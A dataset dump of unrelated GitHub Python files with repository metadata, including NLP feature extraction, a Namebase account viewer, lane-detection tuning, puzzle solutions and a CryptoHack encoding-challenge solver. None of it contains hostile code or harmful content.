len(common_words) * 1.0\n token_features[5] = len(q1_adj & q2_adj)\n token_features[6] = len(q1_prn & q2_prn)\n token_features[7] = len(q1_n & q2_n)\n\n # Features: proportions tokens\n token_features[8] = (len(common_stops) * 1.0) / (\n min(len(q1_stops), len(q2_stops)) + safe_div\n )\n token_features[9] = (len(common_stops) * 1.0) / (\n max(len(q1_stops), len(q2_stops)) + safe_div\n )\n token_features[10] = (len(common_tokens) * 1.0) / (\n min(len(q1), len(q2)) + safe_div\n )\n token_features[11] = (len(common_tokens) * 1.0) / (\n max(len(q1), len(q2)) + safe_div\n )\n\n # Features: conditional tokens\n token_features[12] = int(q1[0] == q2[0])\n token_features[13] = int(q1[-1] == q2[-1])\n\n return (token_features, q1_stemmed, q2_stemmed)\n\n def get_fuzzy_features(self, q1, q2):\n\n fuzzy_features = [0.0] * 3\n\n fuzzy_features[0] = fuzz.partial_ratio(q1, q2)\n fuzzy_features[1] = fuzz.token_sort_ratio(q1, q2)\n fuzzy_features[2] = fuzz.token_set_ratio(q1, q2)\n\n return fuzzy_features\n\n def get_length_features(self, q1, q2):\n\n safe_div = 0.0001\n\n length_features = [0.0] * 4\n\n q1_list = q1.strip(\" \")\n q2_list = q2.strip(\" \")\n\n length_features[0] = (len(q1_list) + len(q2_list)) / 2\n length_features[1] = (len(q1_list) + len(q2_list)) / 2\n substr_len = distance.lcsubstrings(q1, q2, positions=True)[0]\n if substr_len == 0:\n length_features[2] = 0\n else:\n length_features[2] = substr_len / (\n min(len(q1_list), len(q2_list)) + safe_div\n )\n length_features[3] = abs(len(q1_list) - len(q2_list))\n\n return length_features\n\n def extract_features(self, data):\n\n data[\"question1\"] = data[\"question1\"].apply(self.preprocess)\n data[\"question2\"] = data[\"question2\"].apply(self.preprocess)\n\n token_features = data.apply(\n lambda x: self.get_token_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n\n q1_stemmed = list(map(lambda x: x[1], token_features))\n q2_stemmed = list(map(lambda x: x[2], token_features))\n token_features = list(map(lambda x: x[0], token_features))\n\n # Features: counter tokens\n data[\"question1\"] = q1_stemmed\n data[\"question2\"] = q2_stemmed\n data[\"len_question1\"] = list(map(lambda x: x[0], token_features))\n data[\"len_question2\"] = list(map(lambda x: x[1], token_features))\n data[\"words_question1\"] = list(map(lambda x: x[2], token_features))\n data[\"words_question2\"] = list(map(lambda x: x[3], token_features))\n data[\"mutual_words\"] = list(map(lambda x: x[4], token_features))\n data[\"count_mutual_adjective\"] = list(map(lambda x: x[5], token_features))\n data[\"count_mutual_proper_name\"] = list(map(lambda x: x[6], token_features))\n data[\"count_mutual_noun\"] = list(map(lambda x: x[7], token_features))\n\n # Features: proportions tokens\n data[\"ratio_min_stop_words_question\"] = list(\n map(lambda x: x[8], token_features)\n )\n data[\"ratio_max_stop_words_question\"] = list(\n map(lambda x: x[9], token_features)\n )\n data[\"ratio_min_stop_words\"] = list(map(lambda x: x[10], token_features))\n data[\"ratio_max_stop_words\"] = list(map(lambda x: x[11], token_features))\n\n # Features: conditional tokens\n data[\"first_token_equals\"] = list(map(lambda x: x[12], token_features))\n data[\"last_token_equals\"] = list(map(lambda x: x[13], token_features))\n\n # Features: token length\n length_features = data.apply(\n lambda x: self.get_length_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n data[\"len_mean\"] = list(map(lambda x: x[0], length_features))\n data[\"len_median\"] = list(map(lambda x: x[1], length_features))\n data[\"ratio_max_min\"] = list(map(lambda x: x[2], length_features))\n data[\"absolute_difference\"] = list(map(lambda x: x[3], length_features))\n\n # Features: token fuzzy\n fuzzy_features = data.apply(\n lambda x: self.get_fuzzy_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n data[\"ratio_fuzz_partial\"] = list(map(lambda x: x[1], fuzzy_features))\n data[\"ratio_sort_token\"] = list(map(lambda x: x[2], fuzzy_features))\n data[\"ratio_set_token\"] = list(map(lambda x: x[3], fuzzy_features))\n\n return data\n\n def preprocess(self, q):\n\n q = str(q).lower().strip()\n\n q = q.replace(\"%\", \" percent\")\n q = q.replace(\"$\", \" dollar \")\n q = q.replace(\"₹\", \" rupee \")\n q = q.replace(\"€\", \" euro \")\n q = q.replace(\"@\", \" at \")\n\n q = q.replace(\"[math]\", \"\")\n\n q = q.replace(\",000,000,000 \", \"b \")\n q = q.replace(\",000,000 \", \"m \")\n q = q.replace(\",000 \", \"k \")\n q = re.sub(r\"([0-9]+)000000000\", r\"\\1b\", q)\n q = re.sub(r\"([0-9]+)000000\", r\"\\1m\", q)\n q = re.sub(r\"([0-9]+)000\", r\"\\1k\", q)\n\n contractions = {\n \"ain't\": \"am not\",\n \"aren't\": \"are not\",\n \"can't\": \"can not\",\n \"can't've\": \"can not have\",\n \"'cause\": \"because\",\n \"could've\": \"could have\",\n \"couldn't\": \"could not\",\n \"couldn't've\": \"could not have\",\n \"didn't\": \"did not\",\n \"doesn't\": \"does not\",\n \"don't\": \"do not\",\n \"hadn't\": \"had not\",\n \"hadn't've\": \"had not have\",\n \"hasn't\": \"has not\",\n \"haven't\": \"have not\",\n \"he'd\": \"he would\",\n \"he'd've\": \"he would have\",\n \"he'll\": \"he will\",\n \"he'll've\": \"he will have\",\n \"he's\": \"he is\",\n \"how'd\": \"how did\",\n \"how'd'y\": \"how do you\",\n \"how'll\": \"how will\",\n \"how's\": \"how is\",\n \"i'd\": \"i would\",\n \"i'd've\": \"i would have\",\n \"i'll\": \"i will\",\n \"i'll've\": \"i will have\",\n \"i'm\": \"i am\",\n \"i've\": \"i have\",\n \"isn't\": \"is not\",\n \"it'd\": \"it would\",\n \"it'd've\": \"it would have\",\n \"it'll\": \"it will\",\n \"it'll've\": \"it will have\",\n \"it's\": \"it is\",\n \"let's\": \"let us\",\n \"ma'am\": \"madam\",\n \"mayn't\": \"may not\",\n \"might've\": \"might have\",\n \"mightn't\": \"might not\",\n \"mightn't've\": \"might not have\",\n \"must've\": \"must have\",\n \"mustn't\": \"must not\",\n \"mustn't've\": \"must not have\",\n \"needn't\": \"need not\",\n \"needn't've\": \"need not have\",\n \"o'clock\": \"of the clock\",\n \"oughtn't\": \"ought not\",\n \"oughtn't've\": \"ought not have\",\n \"shan't\": \"shall not\",\n \"sha'n't\": \"shall not\",\n \"shan't've\": \"shall not have\",\n \"she'd\": \"she would\",\n \"she'd've\": \"she would have\",\n \"she'll\": \"she will\",\n \"she'll've\": \"she will have\",\n \"she's\": \"she is\",\n \"should've\": \"should have\",\n \"shouldn't\": \"should not\",\n \"shouldn't've\": \"should not have\",\n \"so've\": \"so have\",\n \"so's\": \"so as\",\n \"that'd\": \"that would\",\n \"that'd've\": \"that would have\",\n \"that's\": \"that is\",\n \"there'd\": \"there would\",\n \"there'd've\": \"there would have\",\n \"there's\": \"there is\",\n \"they'd\": \"they would\",\n \"they'd've\": \"they would have\",\n \"they'll\": \"they will\",\n \"they'll've\": \"they will have\",\n \"they're\": \"they are\",\n \"they've\": \"they have\",\n \"to've\": \"to have\",\n \"wasn't\": \"was not\",\n \"we'd\": \"we would\",\n \"we'd've\": \"we would have\",\n \"we'll\": \"we will\",\n \"we'll've\": \"we will have\",\n \"we're\": \"we are\",\n \"we've\": \"we have\",\n \"weren't\": \"were not\",\n \"what'll\": \"what will\",\n \"what'll've\": \"what will have\",\n \"what're\": \"what are\",\n \"what's\": \"what is\",\n \"what've\": \"what have\",\n \"when's\": \"when is\",\n \"when've\": \"when have\",\n \"where'd\": \"where did\",\n \"where's\": \"where is\",\n \"where've\": \"where have\",\n \"who'll\": \"who will\",\n \"who'll've\": \"who will have\",\n \"who's\": \"who is\",\n \"who've\": \"who have\",\n \"why's\": \"why is\",\n \"why've\": \"why have\",\n \"will've\": \"will have\",\n \"won't\": \"will not\",\n \"won't've\": \"will not have\",\n \"would've\": \"would have\",\n \"wouldn't\": \"would not\",\n \"wouldn't've\": \"would not have\",\n \"y'all\": \"you all\",\n \"y'all'd\": \"you all would\",\n \"y'all'd've\": \"you all would have\",\n \"y'all're\": \"you all are\",\n \"y'all've\": \"you all have\",\n \"you'd\": \"you would\",\n \"you'd've\": \"you would have\",\n \"you'll\": \"you will\",\n \"you'll've\": \"you will have\",\n \"you're\": \"you are\",\n \"you've\": \"you have\",\n }\n\n q_decontracted = []\n\n for word in q.split():\n if word in contractions:\n word = contractions[word]\n\n q_decontracted.append(word)\n\n q = \" \".join(q_decontracted)\n q = q.replace(\"'ve\", \" have\")\n q = q.replace(\"n't\", \" not\")\n q = q.replace(\"'re\", \" are\")\n q = q.replace(\"'ll\", \" will\")\n\n q = BeautifulSoup(q)\n q = q.get_text()\n\n pattern = re.compile(\"\\W\")\n q = re.sub(pattern, \" \", q).strip()\n\n return q\n","repo_name":"modestoo/mdm_mestrado","sub_path":"src/preproc/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21986161452","text":"'''\nCreated on 11 ago. 2017\n\n@author: Administrador\n'''\nimport glob\nimport sys\nfrom squareGeometryMatrix import squareGeometryMatrix\nfrom triangleGeometryMatrix import triangleGeometryMatrix\n\nfrom Individual import Individual\nfrom Chromosome import Chromosome\n\n\n#files = glob.glob( 'results/*.txt' )\nfiles = glob.glob(sys.argv[1])\nfor myFile in files:\n print (\"painting file \" + myFile)\n f = open(myFile,'r')\n a = f.readlines()\n\n multiplicity = int(a[6].split(':')[1])\n geometry = a[7].split(':')[1].strip()\n xSize = int(a[8].split(':')[1])\n ySize = int(a[9].split(':')[1])\n energy = float(a[11].split(':')[1])\n\n if geometry==\"square\":\n geometry = squareGeometryMatrix(xSize, ySize, multiplicity)\n else:\n geometry = triangleGeometryMatrix(xSize, multiplicity)\n\n chromosomeList=[]\n for line in a[14:]:\n try:\n newChromosome = Chromosome(int(line.split()[0]), int(line.split()[1]), 1)\n chromosomeList.append(newChromosome)\n except:\n pass\n\n numpyAnclajeList = geometry.getAnclajesListNumpy()\n myindividual = Individual(geometry, numpyAnclajeList, False, False, 1)\n myindividual.chromosomes = chromosomeList\n myindividual.besselValue = energy\n\n outputFileName = myFile[:-4] + \".png\"\n myindividual.paint(outputFileName)\n print (\" OK DONE\")\n","repo_name":"ciemat-tic/DiVoS","sub_path":"paintResults.py","file_name":"paintResults.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43128195009","text":"import requests\nimport json\nimport os\nfrom colorama import init, Fore, Back, Style\nimport time\n\ninit(convert=True)\n\ncolors = [\n Fore.RED,\n Fore.YELLOW,\n Fore.GREEN,\n Fore.CYAN,\n Fore.BLUE,\n Fore.MAGENTA\n ]\n\nendpoint = \"https://www.namebase.io\"\n\npName = Fore.BLUE + \"--- Namebase Extended ---\" + Style.RESET_ALL\n\ndef cClear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef main(cookies):\n cClear()\n\n confirm = input(Fore.GREEN + \"This command returns very sensitive data, only continue if you are not in a public area. (y/n): \" + Style.RESET_ALL).lower()\n\n if confirm.lower() == \"y\":\n pass\n else: \n print(Fore.RED + \"Aborting...\" + Style.RESET_ALL)\n return\n\n cClear()\n\n r = requests.get(endpoint + \"/api/user\", cookies={\"namebase-main\": cookies}).json()\n\n print(Fore.CYAN + \"Email: \" + Fore.WHITE + Style.BRIGHT + str(r['email']))\n print(Fore.CYAN + \"UUID: \" + Fore.WHITE + Style.BRIGHT + str(r['segmentUuid']))\n print(Fore.CYAN + \"HNS Balance: \" + Fore.WHITE + Style.BRIGHT + str(float(r['hns_balance']) / 1000000) + \" HNS\")\n if r['verificationStatus'].lower() == \"verified\":\n print(Fore.CYAN + \"Verified: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Verified: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canLinkBank'] == True:\n print(Fore.CYAN + \"Can Link Bank: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Link Bank: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositHns'] == True:\n print(Fore.CYAN + \"Can Deposit HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositBtc'] == True:\n print(Fore.CYAN + \"Can Deposit BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositUsd'] == True:\n print(Fore.CYAN + \"Can Deposit USD: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit USD: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawHns'] == True:\n print(Fore.CYAN + \"Can Withdraw HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\") \n else:\n print(Fore.CYAN + \"Can Withdraw HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawBtc'] == True:\n print(Fore.CYAN + \"Can Withdraw BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Withdraw BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawUsd'] == True:\n print(Fore.CYAN + \"Can Withdraw USD: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Withdraw USD: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseProExchange'] == True:\n print(Fore.CYAN + \"Can Use Pro Exchange: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Use Pro Exchange: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseConsumerHnsBtc'] == True:\n print(Fore.CYAN + \"Can Exchange HNS/BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Exchange HNS/BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseConsumerBtcHns'] == True:\n print(Fore.CYAN + \"Can Exchange BTC/HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Exchange BTC/HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['isNewYork'] == True:\n print(Fore.CYAN + \"Is New York: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Is New York: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n print(Fore.CYAN + \"Full Name: \" + Style.BRIGHT + str(r['fullName']))\n print(Fore.CYAN + \"Referral Code: \" + Style.BRIGHT + str(r['referralCode']))\n\n\n cont = input(Fore.GREEN + \"Press enter to continue. \" + Style.RESET_ALL).lower()","repo_name":"RunDavidMC/Namebase-Extended","sub_path":"userinfo.py","file_name":"userinfo.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"25280669010","text":"import sys\nsys.stdout = open('./output.txt', 'w')\nsys.stdin = open('./input.txt', 'r')\n\n\ndef answer_finder():\n values = input().split()\n dis = {\n 'R': 1,\n 'B': 2,\n 'G': 3\n }\n if dis[values[0]] < dis[values[1]]:\n print(values[0])\n else:\n print(values[1])\n \n\n\nanswer_finder()\n","repo_name":"naveen701526/Code-Chef-Contest-Problems","sub_path":"0-1000 Beginner Level/GENE01.py","file_name":"GENE01.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13160580883","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nimport os\n\nfrom loadData import loadData\n\nfiles = os.listdir('MPIIMobileAttention/')\ndf = loadData(files[0:1])\nprint(files[0:1])\n\n#features.head()\n\n\ndf = df.drop(columns=['trust_screen', 'environment', 'indoor_outdoor','trust_activity',\n 'user_name', 'message', 'app_description','stat_mobile',\n 'screenstatus', 'screenactivity', 'phone_screenonoff_description',\n 'sem_seg','subject_folder','block_folder', 'object_seg', 'question_type'])\n\n#'evironment_1', 'evironment_2', 'evironment_3', 'evironment_4', 'evironment_5', \n\n#df = df.fillna(0)\n\n#df = df.replace([np.inf, -np.inf], np.nan)\n\ndf = df.dropna(axis='columns')\n\ndf = pd.get_dummies(df)\n\nprint(df.head())\n\n\n# print(\"df: \\n\", df)\n# print(df.dtypes)\n\n# print (df)\nX = df.loc[:, df.columns != 'gaze_on_screen']\nX= np.array(X).astype(np.float32)\nprint(X.dtype)\n\n\ny = np.array(df['gaze_on_screen'])\n\n\nprint('X: \\n', X.dtype, X)\nprint('y: \\n',y.dtype, y)\n\nfrom sklearn.model_selection import train_test_split\n\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n#Create a Gaussian Classifier\nclf=RandomForestClassifier(n_estimators=100)\n\n#Train the model using the training sets y_pred=clf.predict(X_test)\nclf.fit(X_train,y_train)\n\nfrom proximityMatrix import proximityMatrix\n\nproxMat = proximityMatrix(clf, X_train, normalize=True)\n\nprint(\"proxMat: \\n\", proxMat)\n\n\n","repo_name":"naitisb/MobileAttentionManifold","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37031683923","text":"#!/usr/bin/env python\n# Usage: tcpclient $urchub_addr $urchub_port python urcbot.py\n\nimport liburc\nimport sys\nimport os\nimport re\n\nRE = 'a-zA-Z0-9^(\\)\\-_{\\}[\\]|\\\\\\\\'\nre_PRIVMSG = re.compile('^:['+RE+']+![~:#'+RE+'.]+@[~:#'+RE+'.]+ PRIVMSG [#&!+]?['+RE+']+ :.*$',re.IGNORECASE).search\n\nwhile 1:\n buff = os.read(6,2+12+4+8)\n if len(buff) < 2+12+4+8: break\n while len(buff[2+12+4+8:]) != ord(buff[0])*256 + ord(buff[1]):\n b = os.read(6,ord(buff[0])*256 + ord(buff[1]) - len(buff[2+12+4+8:]))\n if not b: sys.exit(0)\n buff += b\n buff = buff[2+12+4+8:]\n\n if re_PRIVMSG(buff):\n src = buff[1:].split('!',1)[0]\n dst = buff.split(' ',3)[2]\n msg = buff.split(' :',1)[1]\n if msg.lower()[:5] == '!ping':\n buff = liburc.urchub_fmt(':bot!bot@bot PRIVMSG '+dst+' :pong\\n')\n os.write(7,buff)\n","repo_name":"JosephSWilliams/urcd","sub_path":"contrib/jsw/urcbot/urcbot.py","file_name":"urcbot.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"14258942766","text":"\"\"\"empty message\n\nRevision ID: a59a50101e2b\nRevises: 329560231692\nCreate Date: 2023-10-29 04:26:57.794240\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'a59a50101e2b'\ndown_revision = '329560231692'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('board', schema=None) as batch_op:\n batch_op.alter_column('member_name',\n existing_type=mysql.VARCHAR(length=10),\n type_=sa.Integer(),\n existing_nullable=True)\n batch_op.create_foreign_key(None, 'users', ['member_name'], ['member_name'])\n\n with op.batch_alter_table('comment', schema=None) as batch_op:\n batch_op.add_column(sa.Column('member_name', sa.Integer(), nullable=True))\n batch_op.create_foreign_key(None, 'users', ['member_name'], ['member_name'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('comment', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.drop_column('member_name')\n\n with op.batch_alter_table('board', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.alter_column('member_name',\n existing_type=sa.Integer(),\n type_=mysql.VARCHAR(length=10),\n existing_nullable=True)\n\n # ### end Alembic commands ###\n","repo_name":"silver-gyo/p4c","sub_path":"migrations/versions/a59a50101e2b_.py","file_name":"a59a50101e2b_.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41461774897","text":"\"\"\"\nGiven the root of a binary tree, invert the\ntree, and return its root.\n\nExample 1:\n\n\nInput: root = [4,2,7,1,3,6,9]\nOutput: [4,7,2,9,6,3,1]\n\nExample 2:\n\nInput: root = [2,1,3]\nOutput: [2,3,1]\n\nExample 3:\n\nInput: root = []\nOutput: []\n \nConstraints:\n\nThe number of nodes in the tree is \nin the range [0, 100].\n\n-100 <= Node.val <= 100\n\nTakeaway:\n\nWe can approach the problem with recursion\n\nSimply make the swap and call the method on to the children Node\n\nDepth-First Search (DFS) in the context of a binary tree. DFS is\n a common algorithm used for traversing or searching tree and \ngraph data structures. In this specific case, it's a pre-order\nDFS because it visits the current node, then recursively explores\nits left and right subtrees.\n\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n \n # my first try\n # the approach was somewhat correct\n def invert_tree(self, root):\n # how do we invert a tree?\n # it it has a child, we should be switching it's children.\n # if it's a leaf, dont do anything\n \n current = root\n if current.left == None and current.right == None:\n return \n while current.left != None and current.right != None:\n temp = current.left\n current.left = current.right\n current.right = temp \n\n return current\n\n def invertTree(self, root):\n if root is None:\n return None\n\n # Swap the left and right subtrees\n root.left, root.right = root.right, root.left\n\n # Recursively invert the left and right subtrees\n self.invertTree(root.left)\n self.invertTree(root.right)\n\n return root","repo_name":"kantarcise/notebook","sub_path":"neetcode/046.invert_binary_tree.py","file_name":"046.invert_binary_tree.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"3204385251","text":"one = 1\nhundred = 100\nattempts = 0\n\nfile = open('results.txt', 'a', encoding='UTF-8')\n\n\nwhile True:\n a = 0\n current = (one + hundred)//2\n number = input('Ваше число {}? '.format(current))\n if number.lower() == 'да':\n attempts += 1\n file.write(f'{current} {number}\\n')\n a = current\n file.write(f'Попытки: {attempts} Загаданное число: {a}\\n')\n print('Я отгадал число')\n break\n elif number == '>':\n attempts += 1\n file.write(f'{current} {number}\\n')\n one = current + 1\n elif number == '<':\n attempts += 1\n file.write(f'{current} {number}\\n')\n hundred = current - 1\n else:\n print('Вводите только <,> и «да»')\n\n\n\n\n\n\n\n\n\n","repo_name":"karumzun/my_hw","sub_path":"Alan_21-2_hw8.py","file_name":"Alan_21-2_hw8.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38119046401","text":"import os\nfrom helper_functions import *\n\nclass EdgeFinder:\n def __init__(self, image, threshold1=0, threshold2=0, rho=0, theta=0, \\\n hough_threshold=0, min_line_len=0, max_line_gap=0, kernel_size=1, \\\n x_offset=0, y_offset=0):\n self.image = image\n self._threshold1 = threshold1\n self._threshold2 = threshold2\n self._rho = rho\n self._theta = theta\n self._hough_threshold = hough_threshold\n self._min_line_len = min_line_len\n self._max_line_gap = max_line_gap\n self._kernel_size = kernel_size\n self._roi_x_offset = x_offset\n self._roi_y_offset = y_offset\n\n self.create_window()\n\n def create_window(self):\n\n def onchangeThreshold1(pos):\n self._threshold1 = pos\n self._render()\n\n def onchangeThreshold2(pos):\n self._threshold2 = pos\n self._render()\n \n def onchangeRho(pos):\n self._rho = pos\n self._render()\n \n def onchangeTheta(pos):\n self._theta = pos\n self._render()\n \n def onchangeHoughThreshold(pos):\n self._hough_threshold = pos\n self._render()\n \n def onchangeMinLineLen(pos):\n self._min_line_len = pos\n self._render()\n \n def onchangeMaxLineLen(pos):\n self._max_line_gap = pos\n self._render()\n \n def onchangeKernelSize(pos):\n self._kernel_size = pos\n self._kernel_size += (self._kernel_size + 1) % 2 # make sure the filter size is odd\n self._render()\n\n def onchangeROIX(pos):\n self._roi_x_offset = pos\n self._render()\n \n def onchangeROIY(pos):\n self._roi_y_offset = pos\n self._render()\n\n cv2.namedWindow(\"edges\")\n\n cv2.createTrackbar('threshold1', 'edges', self._threshold1, 500, onchangeThreshold1)\n cv2.createTrackbar('threshold2', 'edges', self._threshold2, 500, onchangeThreshold2)\n cv2.createTrackbar('rho', 'edges', self._rho, 20, onchangeRho)\n cv2.createTrackbar('theta', 'edges', self._theta, 45, onchangeTheta)\n cv2.createTrackbar('hough_threshold', 'edges', self._hough_threshold, 100, onchangeHoughThreshold)\n cv2.createTrackbar('min_line_len', 'edges', self._min_line_len, 100, onchangeMinLineLen)\n cv2.createTrackbar('max_line_gap', 'edges', self._max_line_gap, 100, onchangeMaxLineLen)\n cv2.createTrackbar('kernel_size', 'edges', self._kernel_size, 21, onchangeKernelSize)\n cv2.createTrackbar('roi_x_offset', 'edges', self._roi_x_offset, 100, onchangeROIX)\n cv2.createTrackbar('roi_y_offset', 'edges', self._roi_y_offset, 100, onchangeROIY)\n self._render()\n\n cv2.waitKey(0)\n cv2.destroyWindow(\"edges\")\n\n\n def set_image(self, image):\n self.image = image\n self._render()\n\n def edgeImage(self):\n return self._edge_img\n\n def smoothedImage(self):\n return self._smoothed_img\n\n def _render(self):\n \n ysize, xsize = self.image.shape[0], self.image.shape[1]\n gray_img = grayscale(self.image)\n gauss_img = gaussian_blur(gray_img, self._kernel_size)\n canny_img = canny(gauss_img, self._threshold1, self._threshold2)\n vertices = np.array([[(xsize//2+self._roi_x_offset, ysize//2+self._roi_y_offset), \\\n (xsize//2-self._roi_x_offset, ysize//2+self._roi_y_offset), \\\n (0, ysize), (xsize, ysize)]], dtype=np.int32)\n canny_img = region_of_interest(canny_img, vertices)\n line_img = hough_lines(canny_img, self._rho, self._theta*np.pi/180, self._hough_threshold, \\\n self._min_line_len, self._max_line_gap)\n\n cv2.polylines(line_img, [vertices], True, (0, 0, 255), 2)\n\n \n final_img = cv2.cvtColor(weighted_img(line_img, initial_img), cv2.COLOR_RGB2BGR)\n \n\n cv2.imshow('edges', final_img)\n print(self._threshold1, self._threshold2, self._rho, self._theta, self._hough_threshold, \\\n self._min_line_len, self._max_line_gap, self._kernel_size, \\\n self._roi_x_offset, self._roi_y_offset)\n\n\nif __name__ == '__main__':\n edge_finder = None\n for ff in os.listdir(\"test_images/\"):\n print(ff)\n initial_img = mpimg.imread(\"test_images/\" + ff)\n if not edge_finder:\n edge_finder = EdgeFinder(initial_img, threshold1=100, threshold2=250, rho=1, theta=2, \\\n hough_threshold=25, min_line_len=20, max_line_gap=40, kernel_size=7, \\\n x_offset=20, y_offset=0)\n else:\n edge_finder.set_image(initial_img)\n edge_finder.create_window()\n \n","repo_name":"kaulshiv/CarND-LaneLines-P1","sub_path":"parameter_tuning.py","file_name":"parameter_tuning.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19396988113","text":"from pwn import * # pip install pwntools\nimport json\nfrom Crypto.Util.number import bytes_to_long, long_to_bytes\nimport base64\nimport codecs\nimport random\nfrom binascii import unhexlify\n\n\nr = remote('socket.cryptohack.org', 13377, level = 'debug')\n\ndef json_recv():\n line = r.recvline()\n return json.loads(line.decode())\n\ndef json_send(hsh):\n request = json.dumps(hsh).encode()\n r.sendline(request)\n\ndef list_to_string(s):\n output = \"\"\n return(output.join(s))\n\n\n# no enunciado, eh dito que temos 100 levels para passar, necessitamos decodificar 100 mensagens\nfor i in range(0,101):\n received = json_recv()\n # FLAG = \"crypto{????????????????????}\"\n # a resposta que queremos esta escrita como \"FLAG\": crypto{\n if \"flag\" in received:\n print(f\"\\n[*] FLAG: {received['flag']}\")\n break\n\n print(f\"\\n[-] Cycle: {i}\")\n print(f\"[-] Received type: {received['type']}\")\n print(f\"[-] Received encoded value: {received['encoded']}\")\n\n palavra_codificada = received[\"encoded\"]\n encoding = received[\"type\"]\n\n\n \"\"\"\n ENCODINGS = [\n \"base64\",\n \"hex\",\n \"rot13\",\n \"bigint\",\n \"utf-8\",\n ]\n \"\"\"\n # {\"type\": \"bigint\", \"encoded\": \"0x77726974696e675f646570656e64735f6c6974\"}\n # para cada encoding retorno, fazemos a o decode para cada uma das possibilidades de encodings\n if encoding == \"base64\":\n decoded = base64.b64decode(palavra_codificada).decode('utf8')\n elif encoding == \"hex\":\n decoded = (unhexlify(palavra_codificada)).decode('utf8') \n elif encoding == \"rot13\":\n decoded = codecs.decode(palavra_codificada, 'rot_13')\n elif encoding == \"bigint\":\n decoded = unhexlify(palavra_codificada.replace(\"0x\", \"\")).decode('utf8')\n elif encoding == \"utf-8\":\n decoded = list_to_string([chr(b) for b in palavra_codificada])\n\n print(f\"[-] Decoded: {decoded}\")\n print(f\"[-] Decoded Type: {decoded}\")\n\n to_send = {\n \"decoded\": decoded\n }\n\n # printa a tag\n 